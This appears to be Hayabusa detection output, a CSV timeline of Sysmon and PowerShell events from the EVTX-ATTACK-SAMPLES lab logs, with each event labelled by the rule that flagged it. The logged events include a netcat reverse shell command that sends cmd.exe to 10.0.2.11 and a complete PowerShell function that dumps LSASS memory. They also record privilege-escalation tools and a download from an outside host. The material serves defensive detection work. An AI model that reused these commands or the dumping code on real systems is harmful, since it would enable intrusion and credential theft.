2020-05-12 08:21:56.519 +09:00,MSEDGEWIN10,17,medium,,Pipe Created_Sysmon Alert,Rogue Epmapper np detected - possible RoguePotato privesc | Pipe: \RoguePotato\pipe\epmapper | Process: c:\Users\IEUser\tools\PrivEsc\RoguePotato.exe | PID: 4200 | PGUID: 747F3D96-DE14-5EB9-0000-0010BE064300,../hayabusa-rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
2020-05-12 08:21:56.519 +09:00,MSEDGEWIN10,17,critical,Evas | PrivEsc,EfsPotato Named Pipe,,../hayabusa-rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
2020-05-12 08:21:56.562 +09:00,MSEDGEWIN10,18,medium,,Pipe Connected_Sysmon Alert,Rogue Epmapper np detected - possible RoguePotato privesc | Pipe: \RoguePotato\pipe\epmapper | Process: System | PID: 4 | PGUID: 747F3D96-545A-5EBA-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
2020-05-12 08:21:56.562 +09:00,MSEDGEWIN10,18,critical,Evas | PrivEsc,EfsPotato Named Pipe,,../hayabusa-rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
2020-05-12 08:21:56.587 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe | Process: C:\Users\IEUser\Tools\Misc\nc64.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: RoguePotato.exe -r 10.0.2.11 -e ""c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe"" -l 9999 | LID: 0x3e7 | PID: 4468 | PGUID: 747F3D96-DE14-5EB9-0000-00107C0F4300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
2020-05-12 08:21:56.661 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe | LID: 0x3e7 | PID: 224 | PGUID: 747F3D96-DE14-5EB9-0000-001079154300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? | LID: 0x3e7 | PID: 5252 | PGUID: 747F3D96-DE32-5EB9-0000-00103FC14300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,../hayabusa-rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
2020-05-13 00:06:49.019 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: Akagi.exe 58 c:\Windows\System32\cmd.exe | Process: C:\Users\IEUser\Tools\PrivEsc\Akagi.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x89eef | PID: 1036 | PGUID: 747F3D96-BB89-5EBA-0000-001057413600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
2020-05-13 00:06:49.019 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
2020-05-13 00:06:49.183 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - Rogue Windir - UAC bypass prep | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Environment\windir: C:\Users\IEUser\AppData\Local\Temp\DNeruK | Process: C:\Windows\explorer.exe | PID: 1036 | PGUID: 747F3D96-BB89-5EBA-0000-001057413600,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
2020-05-13 00:06:49.184 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe | Process: C:\Windows\explorer.exe | PID: 1036 | PGUID: 747F3D96-BB89-5EBA-0000-001057413600,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
2020-05-13 00:06:49.211 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 328 310 0000028A37652590 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6968 | PGUID: 747F3D96-BB89-5EBA-0000-0010FB4C3600,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe -o -previd pe386 | Process: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\DllHost.exe /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41} | LID: 0x89ebf | PID: 1088 | PGUID: 747F3D96-BB89-5EBA-0000-001042653600,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,high,Exec | Evas | PrivEsc,CMSTP UAC Bypass via COM Object Access,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
2020-05-13 00:06:49.447 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: c:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe -o -previd pe386 | LID: 0x89ebf | PID: 4688 | PGUID: 747F3D96-BB89-5EBA-0000-001019683600,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
2020-05-13 09:28:16.122 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s PlugPlay | LID: 0x3e7 | PID: 8052 | PGUID: 747F3D96-3F20-5EBB-0000-0010035E3600,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx
2020-05-13 09:28:52.873 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3080 | PGUID: 747F3D96-3F44-5EBB-0000-001017813700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx
2020-05-13 09:28:52.914 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 6344 | PGUID: 747F3D96-3F44-5EBB-0000-0010EA933700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx
2020-05-13 09:28:52.950 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceAndNoImpersonation -p -s wcncsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 6372 | PGUID: 747F3D96-3F44-5EBB-0000-0010D29A3700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx
2020-05-24 10:13:47.756 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: RogueWinRM.exe -p c:\Windows\System32\cmd.exe | Process: C:\Users\IEUser\Tools\PrivEsc\RogueWinRM.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ""cmd.exe"" | LID: 0x3e5 | PID: 3960 | PGUID: 747F3D96-CA4B-5EC9-0000-0010B8CB3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
2020-05-24 10:13:48.864 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3044 | PGUID: 747F3D96-CA4C-5EC9-0000-001093D53700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
2020-05-24 10:13:50.327 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: c:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: RogueWinRM.exe -p c:\Windows\System32\cmd.exe | LID: 0x3e7 | PID: 1516 | PGUID: 747F3D96-CA4E-5EC9-0000-00109FE23700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
2020-05-24 10:13:50.330 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Tools\PrivEsc\RogueWinRM.exe | PID: 3960 | PGUID: 747F3D96-CA4B-5EC9-0000-0010B8CB3700,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
2020-05-24 10:13:51.206 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49680 (MSEDGEWIN10) | Dst: 127.0.0.1:5985 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\svchost.exe | PID: 3044 | PGUID: 747F3D96-CA4C-5EC9-0000-001093D53700,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
2020-05-24 10:13:51.206 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49680 (MSEDGEWIN10) | Dst: 127.0.0.1:5985 (MSEDGEWIN10) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Users\IEUser\Tools\PrivEsc\RogueWinRM.exe | PID: 3960 | PGUID: 747F3D96-CA4B-5EC9-0000-0010B8CB3700,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: c:\Windows\System32\cmd.exe | LID: 0x3e7 | PID: 4456 | PGUID: 747F3D96-CA52-5EC9-0000-001027FA3700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,../hayabusa-rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
2020-06-30 23:24:08.254 +09:00,MSEDGEWIN10,4104,medium,,Potentially Malicious PwSh,"function Memory($path) { $Process = Get-Process lsass $DumpFilePath = $path $WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting') $WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic') $Flags = [Reflection.BindingFlags] 'NonPublic, Static' $MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags) $MiniDumpWithFullMemory = [UInt32] 2 # $ProcessId = $Process.Id $ProcessName = $Process.Name $ProcessHandle = $Process.Handle $ProcessFileName = ""$($ProcessName).dmp"" $ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName $FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create) $Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle, $ProcessId, $FileStream.SafeFileHandle, $MiniDumpWithFullMemory, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero)) $FileStream.Close() if (-not $Result) { $Exception = New-Object ComponentModel.Win32Exception $ExceptionMessage = ""$($Exception.Message) ($($ProcessName):$($ProcessId))"" # Remove any partially written dump files. For example, a partial dump will be written # in the case when 32-bit PowerShell tries to dump a 64-bit process. Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue throw $ExceptionMessage } else { ""Memdump complete!"" } }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Powershell_4104_MiniDumpWriteDump_Lsass.evtx
2020-06-30 23:24:08.254 +09:00,MSEDGEWIN10,4104,info,,PwSh Scriptblock Log,"function Memory($path) { $Process = Get-Process lsass $DumpFilePath = $path $WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting') $WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic') $Flags = [Reflection.BindingFlags] 'NonPublic, Static' $MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags) $MiniDumpWithFullMemory = [UInt32] 2 # $ProcessId = $Process.Id $ProcessName = $Process.Name $ProcessHandle = $Process.Handle $ProcessFileName = ""$($ProcessName).dmp"" $ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName $FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create) $Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle, $ProcessId, $FileStream.SafeFileHandle, $MiniDumpWithFullMemory, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero)) $FileStream.Close() if (-not $Result) { $Exception = New-Object ComponentModel.Win32Exception $ExceptionMessage = ""$($Exception.Message) ($($ProcessName):$($ProcessId))"" # Remove any partially written dump files. For example, a partial dump will be written # in the case when 32-bit PowerShell tries to dump a 64-bit process. Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue throw $ExceptionMessage } else { ""Memdump complete!"" } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Powershell_4104_MiniDumpWriteDump_Lsass.evtx
2020-06-30 23:24:08.254 +09:00,MSEDGEWIN10,4104,high,CredAccess,PowerShell Get-Process LSASS in ScriptBlock,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_getprocess_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Powershell_4104_MiniDumpWriteDump_Lsass.evtx
2020-06-30 23:24:08.254 +09:00,MSEDGEWIN10,4104,low,Evas,Use Remove-Item to Delete File,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_remove_item_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Powershell_4104_MiniDumpWriteDump_Lsass.evtx
2020-06-30 23:24:08.254 +09:00,MSEDGEWIN10,4104,high,Exec,Accessing WinAPI in PowerShell,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_accessing_win_api.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Powershell_4104_MiniDumpWriteDump_Lsass.evtx
2020-06-30 23:24:08.254 +09:00,MSEDGEWIN10,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Powershell_4104_MiniDumpWriteDump_Lsass.evtx
2020-07-01 05:50:25.546 +09:00,MSEDGEWIN10,10,high,,Process Access_Sysmon Alert,Evasion Suspicious NtOpenProcess Call | Src Process: C:\Users\Public\za3bollo.exe | Tgt Process: C:\Windows\system32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1972 | Src PGUID: 747F3D96-A591-5EFB-0000-00109FE4CC01 | Tgt PID: 2996 | Tgt PGUID: 747F3D96-59BB-5EFB-0000-0010D81B6400,../hayabusa-rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_10_Evasion_Suspicious_NtOpenProcess_CallTrace.evtx
2020-07-01 05:50:25.546 +09:00,MSEDGEWIN10,10,critical,Exec,Direct Syscall of NtOpenProcess,,../hayabusa-rules/sigma/process_access/sysmon_direct_syscall_ntopenprocess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_10_Evasion_Suspicious_NtOpenProcess_CallTrace.evtx
2020-07-01 05:50:25.546 +09:00,MSEDGEWIN10,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_10_Evasion_Suspicious_NtOpenProcess_CallTrace.evtx
2020-07-03 02:51:37.819 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: spooler.exe payload.bin | Process: C:\Users\Public\tools\cinj\spooler.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x89c8f | PID: 6892 | PGUID: 747F3D96-1EA9-5EFE-0000-0010B1F13D00 | Hash: SHA1=68044D72A9FF02839E0164AEB8DFF1EB9B88A94B,MD5=508317C4844B1D2945713CC909D6431D,SHA256=0EB4AFA7216C4BC5E313ECA3EBAF0BD59B90EFF77A246AEF78491AA4FC619A17,IMPHASH=620745A90090718A46AC492610FE8EB4",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx
2020-07-03 02:51:37.819 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx
2020-07-03 02:51:37.822 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\conhost.exe | Tgt Process: c:\Users\Public\tools\cinj\spooler.exe | Src 
User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 640 | Src PGUID: 747F3D96-1E44-5EFE-0000-001060463700 | Tgt PID: 6892 | Tgt PGUID: 747F3D96-1EA9-5EFE-0000-0010B1F13D00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx 2020-07-03 02:51:37.872 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: notepad | Process: C:\Windows\System32\notepad.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\System32\spoolsv.exe | LID: 0x3e7 | PID: 3344 | PGUID: 747F3D96-1EA9-5EFE-0000-00102BF53D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx 2020-07-03 02:51:37.872 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\System32\spoolsv.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2704 | Src PGUID: 747F3D96-1CDA-5EFE-0000-0010E0780100 | Tgt PID: 3344 | Tgt PGUID: 747F3D96-1EA9-5EFE-0000-00102BF53D00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx 2020-07-03 02:51:37.872 +09:00,MSEDGEWIN10,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx 2020-07-03 03:00:29.615 +09:00,LAPTOP-JU4M3I0E,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: chost.exe payload.bin | Process: C:\Users\Public\tools\evasion\chost.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\windows\system32\cmd.exe"" | LID: 0x37e846b4 | PID: 16900 | PGUID: 00247C92-20BD-5EFE-0000-00106D029D3A | Hash: 
SHA1=06A1D9CC580F1CC239E643302CAB9166E0DF6355,MD5=7724B90C1D66AB3FA2A781E344AD2BE5,SHA256=805CA4E5A08C2366923D46680FDFBAD8C3012AB6A93D518624C377FA8A610A43,IMPHASH=A4DE9CE85347166ACB42B7FA4676BF25",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx 2020-07-03 03:00:29.615 +09:00,LAPTOP-JU4M3I0E,1,high,Evas,Execution from Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx 2020-07-03 03:00:29.617 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\conhost.exe | Tgt Process: C:\Users\Public\tools\evasion\chost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 29168 | Src PGUID: 00247C92-1117-5EFE-0000-00105A024E3A | Tgt PID: 16900 | Tgt PGUID: 00247C92-20BD-5EFE-0000-00106D029D3A,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx 2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: notepad | Process: C:\Windows\System32\notepad.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: \??\C:\windows\system32\conhost.exe 0xffffffff -ForceV1 | LID: 0x37e846b4 | PID: 16788 | PGUID: 00247C92-20BD-5EFE-0000-00105C059D3A,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx 2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,1,medium,Evas,Conhost Parent Process Executions,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_conhost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx 2020-07-03 03:00:29.650 
+09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\conhost.exe | Tgt Process: C:\windows\system32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 29168 | Src PGUID: 00247C92-1117-5EFE-0000-00105A024E3A | Tgt PID: 16788 | Tgt PGUID: 00247C92-20BD-5EFE-0000-00105C059D3A,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx 2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx 2020-07-03 17:47:20.037 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x89ccc | PID: 1932 | PGUID: 